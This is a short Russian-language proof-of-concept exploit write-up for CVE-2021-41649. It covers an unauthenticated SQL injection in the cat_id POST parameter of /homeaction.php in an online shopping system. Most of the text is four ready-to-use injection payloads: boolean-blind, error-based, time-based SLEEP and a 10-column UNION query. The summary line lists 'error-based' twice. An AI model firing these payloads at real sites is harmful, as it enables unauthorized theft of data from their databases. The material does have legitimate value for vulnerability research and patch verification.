
Эксплойт proof-of-concept для CVE-2021-41649, демонстрирующий неаутентифицированную SQL-инъекцию в online-shopping-system через параметр cat_id, с нагрузками на основе boolean, error, time и UNION-запросов.
CVE-2021-41649 SQL-инъекция в online-shopping-system
online-shopping-system уязвим для неаутентифицированных атак SQL-инъекций: error-based, boolean-based blind и error-based.
Параметр cat_id на странице /homeaction.php не санирует пользовательский ввод, поэтому злоумышленник может извлечь конфиденциальные данные из нижележащей базы данных MySQL.
URL: /homeaction.php
ПАРАМЕТР: cat_id
Параметр: cat_id (POST-запрос)
Тип: boolean-based blind
Название: AND boolean-based blind - WHERE or HAVING clause
Полезная нагрузка: cat_id=4' AND 9760=9760 AND 'ZCfc'='ZCfc&get_seleted_Category=1
Тип: error-based
Название: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Полезная нагрузка: cat_id=4' AND (SELECT 4034 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (ELT(4034=4034,1))),0x71787a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sGIO'='sGIO&get_seleted_Category=1
Тип: time-based blind
Название: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Полезная нагрузка: cat_id=4' AND (SELECT 9762 FROM (SELECT(SLEEP(5)))PAcf) AND 'hpHO'='hpHO&get_seleted_Category=1
Тип: UNION query
Название: Generic UNION query (NULL) - 10 columns
Полезная нагрузка: cat_id=4' UNION ALL SELECT CONCAT(0x71707a7171,0x746e4d4b5a706566596771585179566943487446575673515244507a52507345694d6b5a754d7049,0x71787a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&get_seleted_Category=1

Jason Colyvas
MOBIUSBINARY
21 сентября 2021 года